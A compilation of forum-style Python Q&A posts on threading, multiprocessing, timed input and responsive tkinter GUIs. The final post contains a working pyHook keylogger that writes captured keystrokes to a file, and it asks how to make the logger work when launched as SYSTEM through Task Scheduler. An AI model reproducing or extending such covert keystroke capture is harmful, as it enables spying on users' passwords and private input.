When I use threading.Thread to create a new thread, it does not start. The code looks like this:
import threading
import time
import sys
def worker():
    count = 1
    while True:
        if count >= 6:
            break
        time.sleep(1)
        count += 1
        print("thread name = {}, thread id = {}".format(threading.current_thread().name, threading.current_thread().ident))
t1 = threading.Thread(target=worker,name="t1")
t2 = threading.Thread(target=worker,name='t2')
t1.start()
t2.start()
t1.join()
t2.join()
When I run this code under windbg, it reports no error, prints nothing, and never returns.
I want to create a new thread to run something.
Don't use 'threading' within windbg. Windbg has its own multithreading model and its own loop of debug events; it is nearly impossible to run all these threads together without bugs.
In fact, I don't recommend using 'threading' even in a standalone Python program with the pykd module. All my scripts use the 'multiprocessing' module instead.
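For illustration, here is a minimal standalone sketch of that multiprocessing approach (my own example, not from the original answer, with any pykd-specific calls omitted):
import multiprocessing
import time

def worker():
    for count in range(1, 6):
        time.sleep(1)
        proc = multiprocessing.current_process()
        print("process name = {}, pid = {}".format(proc.name, proc.pid))

if __name__ == '__main__':  # required on Windows, where child processes are spawned
    p1 = multiprocessing.Process(target=worker, name="p1")
    p2 = multiprocessing.Process(target=worker, name="p2")
    p1.start()
    p2.start()
    p1.join()
    p2.join()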
I am trying to allow a user to input multiple answers, but only within an allocated amount of time. The problem is that the program will not interrupt a pending input; it only stops the user if an answer is entered after the time ends. Any ideas? Is what I am trying to do even possible in Python?
I have tried using threading and the signal module, but they both result in the same issue.
Using Signal:
import signal

def handler(signum, frame):
    raise Exception

def answer_loop():
    score = 0
    while True:
        answer = input("Please input your answer")

signal.signal(signal.SIGALRM, handler)
signal.alarm(5)
try:
    answer_loop()
except Exception:
    print("end")
signal.alarm(0)
Using Threading:
from threading import Timer

def end():
    print("Time is up")

def answer_loop():
    score = 0
    while True:
        answer = input("Please input your answer")

time_limit = 5
t = Timer(time_limit, end)
t.start()
answer_loop()
t.cancel()
Your problem is that the built-in input has no timeout parameter and, AFAIK, threads cannot be terminated by other threads. I suggest instead that you use a GUI with events to finely control user interaction. Here is a bare-bones tkinter example:
import tkinter as tk

root = tk.Tk()
label = tk.Label(root, text='answer')
entry = tk.Entry(root)
label.pack()
entry.pack()

def timesup():
    ans = entry.get()
    entry.destroy()
    label['text'] = f"Time is up. You answered {ans}"

root.after(5000, timesup)
root.mainloop()
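The design point here is that root.after schedules timesup on Tk's own event loop instead of blocking the way a console input call does, so the user can keep typing into the Entry until the callback fires. If you also want to accept an answer before the deadline, binding the entry's <Return> event to a handler would work along the same lines.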
I'm running Jupyter 5.0.0 notebook with Python 3.5.3 on Windows 10. The following example code fails to run:
from concurrent.futures import as_completed, ProcessPoolExecutor
import time
import numpy as np
def do_work(idx1, idx2):
    time.sleep(0.2)
    return np.mean([idx1, idx2])

with ProcessPoolExecutor(max_workers=4) as executor:
    futures = set()
    for idx in range(32):
        future = executor.submit(do_work, idx, idx * 2)
        futures.add(future)

    for future in as_completed(futures):
        print(future.result())
... and throws BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.
The code works perfectly fine on Ubuntu 14.04.
I understand that Windows doesn't have os.fork, so multiprocessing is handled differently there and doesn't always play nicely with interactive mode and Jupyter.
What are some workarounds to make ProcessPoolExecutor work in this case?
There are some similar questions, but they relate to multiprocessing.Pool:
multiprocessing.Pool in jupyter notebook works on linux but not windows
Closer inspection shows that a Jupyter notebook can run an external Python module that is parallelized using ProcessPoolExecutor. So, a solution is to put the parallelizable part of your code in a module and call it from the Jupyter notebook, as sketched below.
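For example, the simple version of that idea looks like this (a minimal sketch; the module name workers.py is my own placeholder):
# workers.py -- hypothetical external module holding the parallel work
import time
import numpy as np

def do_work(idx1, idx2):
    time.sleep(0.2)
    return np.mean([idx1, idx2])
and, in the notebook:
from concurrent.futures import as_completed, ProcessPoolExecutor
from workers import do_work

with ProcessPoolExecutor(max_workers=4) as executor:
    futures = {executor.submit(do_work, idx, idx * 2) for idx in range(32)}
    for future in as_completed(futures):
        print(future.result())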
That said, this can be generalized as a utility. The following can be stored as a module, say winprocess.py, and imported by the notebook.
import inspect
import types

def execute_source(callback_imports, callback_name, callback_source, args):
    # Re-create the imports and the function source inside the child process.
    for callback_import in callback_imports:
        exec(callback_import, globals())
    exec(callback_source)
    callback = locals()[callback_name]
    return callback(*args)

def submit(executor, callback, *args):
    # Ship the function as source text rather than as a pickled notebook object.
    callback_source = inspect.getsource(callback)
    callback_imports = list(imports(callback.__globals__))
    callback_name = callback.__name__
    future = executor.submit(
        execute_source,
        callback_imports, callback_name, callback_source, args
    )
    return future

def imports(callback_globals):
    # Yield an 'import x [as y]' line for every module visible to the callback.
    for name, val in list(callback_globals.items()):
        if isinstance(val, types.ModuleType) and val.__name__ != 'builtins' and val.__name__ != __name__:
            import_line = 'import ' + val.__name__
            if val.__name__ != name:
                import_line += ' as ' + name
            yield import_line
Here is how you would use this:
from concurrent.futures import as_completed, ProcessPoolExecutor
import time
import numpy as np
import winprocess

def do_work(idx1, idx2):
    time.sleep(0.2)
    return np.mean([idx1, idx2])

with ProcessPoolExecutor(max_workers=4) as executor:
    futures = set()
    for idx in range(32):
        future = winprocess.submit(
            executor, do_work, idx, idx * 2
        )
        futures.add(future)

    for future in as_completed(futures):
        print(future.result())
Notice that executor.submit has been changed to winprocess.submit, and the original executor is passed to that function as a parameter.
What happens here is that the notebook function's code and imports are serialized and passed to the module for execution. The code is not executed until it is safely inside a new process, so it does not trip over trying to spawn a new process based on the Jupyter notebook itself.
Imports are handled in such a way as to maintain aliases. The import magic can be removed if you make sure to import everything the function needs inside the function itself, as shown below.
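For instance, a fully self-contained version of do_work from the question would look like this (a sketch):
def do_work(idx1, idx2):
    # Imports live inside the function, so no import forwarding is needed.
    import time
    import numpy as np
    time.sleep(0.2)
    return np.mean([idx1, idx2])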
Also, this solution only works if you pass all necessary variables as arguments to the function. The function should be static, so to speak, but I think that's a requirement of ProcessPoolExecutor as well. Finally, make sure the function doesn't call other functions defined elsewhere in the notebook: only external modules are imported, so other notebook functions won't be included.
I use the Spyder IDE. Usually, when I am running non-parallelized scripts, I tend to debug using print statements. Depending on which statements are printed (or not), I can see where errors are occurring.
For example:
print "Started while loop..."
doWhileLoop = False
while doWhileLoop == True:
print "Doing something important!"
time.sleep(5)
print "Finished while loop..."
Above, I am missing a line that changes doWhileLoop to False at some point, so I will be stuck perpetually in the while loop, but my print statements let me see where in my code I have hung up.
However, when running scripts that are parallelized, I get no output to the console until after the process has finished. Normally, what I do in this case is attempt to debug with a single process (i.e. temporarily de-parallelize the program by running only one task). Currently, however, I am dealing with an error that seems to occur only when I am running more than one task.
So, I am having trouble figuring out what this error is using my usual methods -- how should I change my usual debugging practice in order to efficiently debug scripts employing multiprocessing?
As @roippi said, debugging parallel code is hard. Another tool is using logging instead of print: logging gives you severity levels, timestamps, and, most importantly, which process is doing what.
Example code:
import logging
import multiprocessing
import Queue  # Python 2; use 'queue' on Python 3

def myproc(arg):
    return arg * 2

def worker(inqueue, outqueue):
    mylog = multiprocessing.get_logger()
    mylog.info('start')
    for job in iter(inqueue.get, 'STOP'):
        mylog.info('got %s', job)
        try:
            outqueue.put(myproc(job), timeout=1)
        except Queue.Full:
            mylog.error('queue full!')
    mylog.info('done')

def executive(inqueue):
    total = 0
    mylog = multiprocessing.get_logger()
    for num in iter(inqueue.get, 'STOP'):
        total += num
        mylog.info('got %s, total %s', num, total)

logger = multiprocessing.log_to_stderr(
    level=logging.INFO,
)
logger.info('setup')

inqueue, outqueue = multiprocessing.Queue(), multiprocessing.Queue()
if 0:  # debug 'queue full!' issues
    outqueue = multiprocessing.Queue(maxsize=1)

# prefill with 3 jobs
for num in range(3):
    inqueue.put(num)
# signal end of jobs
inqueue.put('STOP')

worker_p = multiprocessing.Process(
    target=worker, args=(inqueue, outqueue),
    name='worker',
)
worker_p.start()
worker_p.join()
logger.info('done')
Example output:
[INFO/MainProcess] setup
[INFO/worker] child process calling self.run()
[INFO/worker] start
[INFO/worker] got 0
[INFO/worker] got 1
[INFO/worker] got 2
[INFO/worker] done
[INFO/worker] process shutting down
[INFO/worker] process exiting with exitcode 0
[INFO/MainProcess] done
[INFO/MainProcess] process shutting down
I have a simple GUI which runs various scripts from another Python file. Everything works fine until the GUI runs a function that contains a while loop, at which point the GUI seems to crash and becomes inactive. Does anybody have any ideas as to how this can be overcome? I believe it has something to do with the GUI being updated. Thanks. Below is a simplified version of my GUI.
GUI
#!/usr/bin/env python
# Python 3
from tkinter import *
from tkinter import ttk
from Entry import ConstrainedEntry
import tkinter.messagebox
import functions
AlarmCode = "2222"
root = Tk()
root.title("Simple Interface")
mainframe = ttk.Frame(root, padding="3 3 12 12")
mainframe.grid(column=0, row=0, sticky=(N, W, E, S))
mainframe.columnconfigure(0, weight=1)
mainframe.rowconfigure(0, weight=1)
ttk.Button(mainframe, width=12,text="ButtonTest",
command=lambda: functions.test()).grid(
column=5, row=5, sticky=SE)
for child in mainframe.winfo_children():
child.grid_configure(padx=5, pady=5)
root.mainloop()
functions
import time

def test():
    period = 0
    while True:
        if period <= 100:
            time.sleep(1)
            period += 1
            print(period)
        else:
            print("100 seconds has passed")
            break
What happens above is that while the loop is running, the application hangs. With the break in the else branch, everything recovers once the period has elapsed, but I want users to be able to click buttons while loops are running, as this GUI will run a number of different functions.
Don't use time.sleep in the same thread as your Tkinter code: it freezes the GUI until the execution of test is finished. To avoid this, you should use the after widget method:
# GUI
ttk.Button(mainframe, width=12,text="ButtonTest",
command=lambda: functions.test(root))
.grid(column=5, row=5, sticky=SE)
# functions
def test(root, period=0):
if period <= 100:
period += 1
print(period)
root.after(1000, lambda: test(root, period))
else:
print("100 seconds has passed")
Update:
In your comment you add that your code won't use time.sleep, so your original example may not be the most appropriate. In that case, you can create a new thread to run your intensive code.
Note that I presented the after alternative first because multithreading should be used only if it is completely necessary: it adds overhead to your application, as well as more difficulty in debugging your code.
from threading import Thread

ttk.Button(mainframe, width=12, text="ButtonTest",
           command=lambda: Thread(target=functions.test).start()).grid(
    column=5, row=5, sticky=SE)

# functions
def test():
    for x in range(100):
        time.sleep(1)  # Simulate intense task (not real code!)
        print(x)
    print("100 seconds has passed")
Using Windows 7 and Python 2.7, I wrote and compiled the code below (with pyinstaller 2.0). It works fine if I start it by right-clicking and choosing "run as admin", but when I start it through the Task Scheduler as the SYSTEM user, it does not log any keys: after the 10-second wait, it just creates an empty output file. I'm thinking that because I'm running it under a different account, it's not hooking the "correct" keyboard?
import threading
import pyHook
import pythoncom
import time
def OnKeyboardEvent(event):
    global keylog
    keylog.append(chr(event.Ascii))
    return

class thekeylogger(threading.Thread):
    def run(self):
        hm = pyHook.HookManager()
        hm.KeyDown = OnKeyboardEvent
        hm.HookKeyboard()
        pythoncom.PumpMessages()
        return

keylog = []
thekeylogger().start()
time.sleep(10)
keys = "".join(keylog)
output_file = open('c:\\project\\test.txt', 'w')
output_file.write(keys)
output_file.close()